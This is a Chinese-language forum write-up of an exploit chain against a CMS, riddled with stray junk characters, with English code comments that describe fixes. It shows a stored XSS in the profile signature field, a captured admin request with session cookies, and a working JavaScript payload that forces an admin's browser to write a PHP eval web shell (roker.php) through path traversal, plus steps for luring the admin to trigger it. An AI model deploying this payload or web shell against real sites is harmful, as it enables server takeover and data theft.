这个cms 以前有人发了个getshell,当时是后台验证文件的问题
官网已经修补了,所以重新下了源码
因为后台登入还需要认证码,所以注入就没看了。
存在 xss:
漏洞文件 user/member/skin_edit.php
<!-- Signature ("签名") field of the profile editor. The textarea below prints
     $cscms_qianm with a bare echo and no htmlspecialchars(), so whatever user/do.php
     stored in CS_Qianm is rendered as markup here: this is the stored-XSS sink.
     Encoding at this output point is the primary fix. -->
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
" @4 P8 D1 ?5 z, k
/ { j- ?. k5 a</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
% S: }. [9 B' Q0 e
4 T5 D$ S3 _' `! E9 C' ~8 [</textarea></td></tr>
- y% j" ?2 P9 d) F % s/ U; K& ^2 h" Q0 c6 {
user/do.php
% c7 f3 t0 [5 H: U2 _9 H* }! a, m- b$ ~' o( d1 N3 @; l
! A: A" M7 m" K4 U0 ]- c3 b) @if($op=='zl'){ //资料
- `: F0 N3 S T; I1 p! B # e" I1 ?7 l. T; Z
// Body of the "资料" (profile) branch of user/do.php: validates presence of a few fields,
// then writes the submitted profile values, including the signature CS_Qianm, to the user row.
// Only emptiness is checked here; nothing in this excerpt validates or encodes the values.
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
& ]% m, a$ ~, e6 S) K exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
9 G- p9 X9 a. S/ j( I # B' q: q# q3 p, y+ I4 C5 b
// CS_Qianm is stored unchanged (the skin_edit.php form above posts it under that name and
// later echoes it back with a bare echo), which is the stored-XSS path the writeup describes:
// encode at output, validate at input as defence in depth.
// The UPDATE is also assembled by string concatenation. Whether an earlier global escaping
// step protects these values is not visible in this excerpt (the author did not examine
// injection); a prepared statement would remove the question either way.
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 f% C: R7 Z! v, d/ k8 D2 v+ k
; `. n2 \% h; L: `; w0 X CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
1 H5 W; S% C$ ]! ~/ D9 @* k* r where CS_Name='".$cscms_name."'";& U @ O- H! X; p
// Success/failure is reported to the user via Msg_Error in both branches; the raw query result
// is not exposed.
" {6 v7 L" d2 N: e+ ~. x0 ` if($db->query($sql)){- D- U6 t: X2 e' d7 ^
& _$ ]( n. y' j
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
8 q w8 Q7 M" e6 [$ X ]' ^4 z5 N : G$ i8 i8 d U: @6 `8 W
}else{
3 F# u) p6 w% ^$ N8 l f5 g
d) p, Q. S& N2 x exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));0 U0 X6 V# q% a. k8 Q, q$ g3 E
1 x3 t, c, {! u2 j& z; T }6 b5 j J: ?+ S! l* d% _9 w ~
, Z* i: ~( J, Y1 z# J* Z
没有过滤导致xss产生。
后台看了下,很奇葩的是可以写任意格式文件。
抓包。。
9 ^6 {* H: }* ~* | t1 J
' V; j1 T4 g) I; z3 g" u' q, f i/ G+ P! |9 _5 q
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
. Q2 }' t# l y4 i( C' |3 N
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
- U/ R& ?; v* S, S
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
3 h% r3 Q9 }" T5 I, K0 k # s" p9 C4 N0 |! Q0 O$ \
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
/ |6 n' I0 f. ~7 D5 W# r
Content-Length: 38
; ^4 F* J1 b K: j; y- d7 K8 P# Z
DNT: 1
' a" v/ O0 S! D9 x& @" y/ m( A
Connection: Keep-Alive
6 ~$ i; D9 c% w3 b
Cache-Control: no-cache
, ]* e8 p- Q ]/ P& @Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594+ ?2 E& e% @% T; e
& U( h, i' [6 [1 q
( w9 j1 p4 |6 a) s5 k9 t9 y
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
2 y. h2 m5 A4 Q. I' F6 t' C: [3 B6 S' I# W
于是构造js如下。
H8 s9 x7 d1 S5 ?
<script>
// Target URL for the auto-submitted form below. The host is taken from the page the script
// runs in (presumably so it need not be hard-coded); the path is the admin skin-editor
// endpoint from the capture above, including its ../../ traversal. The request goes out with
// whatever cookies the viewer's browser already holds for that host (the capture shows a
// cookie-only admin session), which is exactly what a per-request CSRF token or SameSite
// cookies would break.
thisTHost = top.location.hostname;& i$ N- c. `5 {- {5 E
" m! M7 G; S% E( U2 S5 XthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";/ X! l& }- V& ?: y
/**
 * Builds a hidden POST form with two fields, `name` and `content`, and submits it from the
 * viewer's browser. Because the page carrying this script is rendered to an admin (stored
 * XSS in the signature field), the request is sent with the admin's own session cookies —
 * the endpoint's only visible protection in the capture above. A server-side CSRF token
 * checked per request, or SameSite cookies plus an Origin check, makes this submission fail.
 * @param {string} url  - form action URL.
 * @param {string} data - value of the `name` field.
 * @param {string} msg  - value of the `content` field (the parameter name is misleading).
 */
; I2 G8 i' K8 D1 V+ ^0 \function PostSubmit(url, data, msg) {
" i) c. n7 Y/ G/ h% Y var postUrl = url;
& Z/ ~# D5 V- c' `3 D * C s( J0 g; M: X& F( B- c# n
var postData = data;
, t' e, ~8 ]+ b2 {9 v) Q var msgData = msg; + n1 L3 s# _- p- b( p0 _
// The form is attached to the document first and populated afterwards; no CSRF token field
// is added, so the request only succeeds where the endpoint does not demand one.
var ExportForm = document.createElement("FORM"); ! @% u; O4 R0 P7 o
document.body.appendChild(ExportForm);
0 ^- c' f& B5 Y$ K; l/ R- I ExportForm.method = "POST";
! F2 `7 {. y/ A' Y9 U var newElement = document.createElement("input"); + N& P) f5 F# \' K- H1 g& u
newElement.setAttribute("name", "name");
2 z' G# y# v5 Q; O9 l4 q! r newElement.setAttribute("type", "hidden");
, e0 B' M8 W. G var newElement2 = document.createElement("input"); ' ?( ^5 ~0 a! R9 a6 f1 H
newElement2.setAttribute("name", "content");
! T8 G4 A' T, Y: l9 Y" V$ {8 D7 W newElement2.setAttribute("type", "hidden"); 4 y j$ t: w8 x# s9 `, b
ExportForm.appendChild(newElement); * b/ f( X& R6 s" n- w. F6 d6 Q5 s0 h1 `
ExportForm.appendChild(newElement2);
( V6 s/ y* l: A4 ~5 F& Y newElement.value = postData;
3 h( x! X( L$ M# g0 h) | newElement2.value = msgData;
; M' ?& W" K8 Q/ }' U' } ExportForm.action = postUrl;
// submit() navigates the current document to the response, so the viewer sees the result page.
; y. @5 r" D7 Z- j ExportForm.submit();
( {: P" D0 ^; q9 b$ K' o' Y1 ?};$ K7 f l- Y+ j, u
// Posts name=roker.php with PHP source as content to the skin editor; together with the
// traversal in the URL above this writes a .php file under skins/index/html/ (the writeup
// reports the file is created). Server-side, an allowlist of editable extensions and a path
// canonicalised and confined to the skins base directory would reject both the name and
// the path; the capture suggests neither check exists.
( [4 A+ l, E' O- H. W* V2 FPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");- b6 ~6 T5 q6 `& }. _4 s
7 \4 J; F9 u1 a+ W$ l: ~
</script>
8 U4 y# W- f9 E0 w) S$ n8 l
9 }: |( s, d" y4 x0 @6 [9 W& b% k" {+ t, y0 O
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
* u" S1 E' j1 r1 H$ Z- k( c/ Q2 Y用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
就会在 skins\index\html\ 目录下生成 roker.php 一句话。